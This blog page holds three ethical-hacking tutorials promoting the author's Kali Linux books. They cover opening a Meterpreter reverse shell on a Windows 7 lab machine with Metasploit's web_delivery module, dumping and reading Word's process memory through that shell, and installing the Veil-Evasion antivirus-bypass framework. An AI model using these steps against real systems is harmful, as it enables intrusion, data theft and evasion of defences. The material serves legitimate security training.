Easy Remote Shells with Web Delivery

This is a sneak peak at a section of the “Web Delivery” chapter in my new Ethical Hacking book, “Intermediate Security Testing with Kali Linux 2“. The Metasploit Web Delivery module is one of the easiest ways to quickly get a remote shell from a Linux, Mac or Windows system. In the full chapter I show how to use it against all three platforms. For the preview we will only cover Windows based targets.

As always, never try to access a network or system that you do not have express written permission to do so. Accessing systems that you don’t have permission to is illegal and you could end up in jail.

Web Delivery

In this section we will learn how to  using the Web Delivery exploit module. We will be using Metasploit and our Windows 7 VM as the target.

Let’s get started!

1. From a Kali terminal, type “msfconsole”:

Metasploit Web Delivery 1
2. Now enter:

  •  use exploit/multi/script/web_delivery
  •  set lhost [Kali IP Address]
  •  set lport 4444

3. Type, “show targets”:

Metasploit Web Delivery 2

Notice we have 3 options, Python, PHP and PSH (PowerShell). We will be attacking a Windows system, so we will use PowerShell.

4. Enter, “set target 2”
5. Set the payload, “set payload windows/meterpreter/reverse_tcp”
6. You can check that everything looks okay with “show options”:

Metasploit Web Delivery 3
7. Now type, “exploit”:

Metasploit Web Delivery 4

This starts a listener server that hosts our payload and then waits for an incoming connection. All we need to do is run the generated PowerShell command on our target system.

8. On the Windows 7 system, open a command prompt and paste in and execute the PowerShell command:

Metasploit Web Delivery 5
And after a few seconds you should see:

Metasploit Web Delivery 6

A meterpreter session open!

9. Now type, “sessions” to list the active sessions
10. Connect to it with “sessions -i 1”

Metasploit Web Delivery 7

We now have a full Meterpreter shell to the target:

Metasploit Web Delivery 8
Type “exit” to quit the active session and “exit” again to exit Metasploit.

I hope you enjoyed this chapter section preview. In the full chapter, I show how Web Delivery can be set to work against Linux and Mac systems also. In addition in the Msfvenom chapter you will also see how to make standalone executable shells that don’t require the target to open a command prompt on their system and manually run the code.

For a lot more ethical hacking training and hands on tutorials, check out “Intermediate Security Testing with Kali Linux 2” available on Amazon.com.

Advertisements

Pulling Remote Word Documents from RAM using Kali Linux

Really enjoyed the article on W00tsec about pulling RAW picture images from memory dumps and thought it would be cool if you could use the same process to pull information from a remote system’s memory using Kali – and you can!

In this tutorial we will see how to pull a Word document from a remote machine’s memory, parse it for text and view it in Kali Linux.

The target system is a Windows 7 PC running Office 2010. We will start with a remote metasploit meterpreter shell session already active. So basically we tricked our test system into running our booby trapped file which created a back door to our Kali system.

So we want to grab the remote memory, but we only want the memory in use by the Word process. Following the w00tsec tutorial we just need to use the SysInternals ProcDump command. ProcDump is available from Microsoft’s Technet site, it is part of the SysInternals Suite. This command allows you to pull memory for specific processes.

You may want to grab the SysInternal’s “Strings” program too while you are there. “Strings” is a Windows version of the Linux command that we will be using later.

These programs will need to be uploaded to the target system from Meterpreter.

Next, in the Metasploit DOS shell, type “tasklist” to see what is running on the remote Windows system:

tasklist

Further down the list we see that the user has an open session of MS Word (WINWORD.EXE):

processes

Run the procdump command using the “-ma” switch and the process name “WINWORD.EXE”, lastly we will call the resultant dump file “word” as seen below:

procdump

We now have a memory dump stored on our remote system called “word.dmp”. The file is pretty large, 362 MB, we could just download that file back to our Kali system – but we can shrink it. We are really only looking for text in the memory dump. We have two options here, we can use the SysInternals “Strings” program to work through the data dump and remove all the text from it (significantly reducing the download size) or we can download the whole file en-mass  back to our Kali system and use the Linux “strings” command to parse it.

The choice is yours, but I will say with just using the default program settings in both, the Linux one did a much better job of parsing the file.

But basically the command is the same in both versions, “strings word.dmp > word.txt

Now if we open the resultant text file in Kali, we see a ton of information – System settings, variables that are set on the system, I even found registry keys mentioned. But eventually we will see this (Produced with the Linux strings command):

Kali Strings Result

Compare that to the Word document we have open on the Windows 7 machine:

Original Document

As you can see the Nmap user manual open on our Windows 7 system has been successfully grabbed from memory remotely, and we can now view the text on our Kali system!

I know there are other forensics programs out there that will do basically the same thing, and this is not a forensically sound way of preserving data needed in a legal case, but it is a lot of fun doing this manually and opens up some interesting possibilities!

The best way to defend against these types of attacks are to follow good security practices against social engineering and Phishing type attacks. An attacker would need a remote connection to your system to be able to pull items from your memory. Do not open unknown or unsolicited attachments in e-mails. Be leery of odd sounding links sent to you from a friend’s account and use a script blocker and good AV Internet security program when surfing the web.

Want to learn more about Kali Linux and Metasploit? Check out my book, “Basic Security Testing with Kali Linux“.

Installing Veil Framework on Kali Linux

I have been notified that they are problems installing Veil Framework (AV bypass) in Kali using the apt-get install command. From the creator’s website it looks like the recommended install is to now clone Veil from the Github repository and then run the included setup routine.

Instructions can be found at the Veil Framework updates page, but I will include a tutorial here.

For advanced users:

$ git clone https://github.com/Veil-Framework/Veil-Evasion.git
$ cd Veil-Evasion/setup/
$ ./setup.sh

Then just follow through the install, taking the defaults.

Step-by-Step Guide

From a Kali terminal prompt type, “git clone https://github.com/Veil-Framework/Veil-Evasion.git. This will clone Veil into the “Veil-Evasion” directory. When done change to the “Veil-Evasion/setup” directory and run “./setup.sh”:

Veil 1

Type, “Y” when prompted to continue with install, then sit back and relax, as the next part can take a while.

At the Python setup screen just click, “Next”:

Veil 2

At the Select Destination Directory screen, leave the default destination and click “Next”, then click “Yes” when prompted to overwrite existing Python files:

Veil 3

Continue through Python install leaving default settings, click “Finish” when done.

The install then begins the pywin32 setup.

At the main pywin32 setup screen, press “Next” to continue:

Veil 4

Leave default values on the Python directory location screen and click “next”, then “next” again, and “finish” to complete install.

The install then begins the pycrypto setup.

At the main pycrypto setup screen, press “Next” to continue:

Veil 5

Again leave the Python information that is populated by default and click “Next”, “next” again and then “Finish” when done.

Setup will then complete. And that is it; we are now ready to run Veil!

Running Veil Evasion

From the Veil-Evasion directory, run “./Veil-Evasion.py”, and you will see the main Veil Screen:

Veil 6

And there you go, you are now all set to use Veil Evasion on Kali Linux!

(** Note: My book, Basic Security Testing with Kali Linux which includes a tutorial on using Veil Evasion, is in the process of being updated to reflect the install tutorial changes.)